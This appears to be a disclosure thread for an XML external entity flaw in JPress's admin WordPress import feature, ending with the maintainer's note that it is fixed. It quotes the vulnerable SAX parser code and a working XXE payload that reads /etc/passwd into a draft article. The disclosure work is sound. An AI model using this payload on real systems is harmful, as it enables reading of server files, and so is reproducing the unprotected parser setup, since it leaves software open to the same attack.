background XML entity injection vulnerability

[hack4money]

"系统管理"-"系统"-"小工具箱"-"WordPress文章导入":

io.jpress.module.article.controller.admin._WordpressImport#doWordPressImport

public void doWordPressImport() {

    UploadFile ufile = getFile();
    if (ufile == null) {
        renderJson(Ret.fail("message", "您还未选择WordPress文件"));
        return;
    }

    if (!".xml".equals(FileUtil.getSuffix(ufile.getFileName()))) {
        renderJson(Ret.fail("message", "请选择从WordPress导出的XML文件"));
        return;
    }

    String newPath = AttachmentUtils.moveFile(ufile);
    File xmlFile = AttachmentUtils.file(newPath);

    WordPressXmlParser wordPressXmlParser = new WordPressXmlParser();
    wordPressXmlParser.parse(xmlFile);

    List<Article> contents = wordPressXmlParser.getArticles();
    if (ArrayUtil.isNotEmpty(contents)) {
        doSaveArticles(contents);
    }

    List<Attachment> attachments = wordPressXmlParser.getAttachments();
    if (ArrayUtil.isNotEmpty(attachments)) {
        doSaveAttachements(attachments);
    }

    renderOkJson();
}

io.jpress.module.article.kit.wordpress.WordPressXmlParser#parse

public void parse(File wordpressXml) {
    try {
        SAXParserFactory factory = SAXParserFactory.newInstance();
        SAXParser parser = factory.newSAXParser();
        parser.parse(wordpressXml, this);
    } catch (Exception e) {
        log.warn("ConfigParser parser exception", e);
    }

}

upload a constructed xml，such as：

<?xml version = "1.0"?>
<!DOCTYPE ANY [
<!ENTITY f SYSTEM "file:///etc/passwd">
]>

<item>
<wp:post_type>post</wp:post_type>
<title>2</title>
<content:encoded>&f;</content:encoded>
<wp:status>draft</wp:status>
</item>

The /etc/passwd contents can be read in draft article：

[JPressProjects]

已经修复...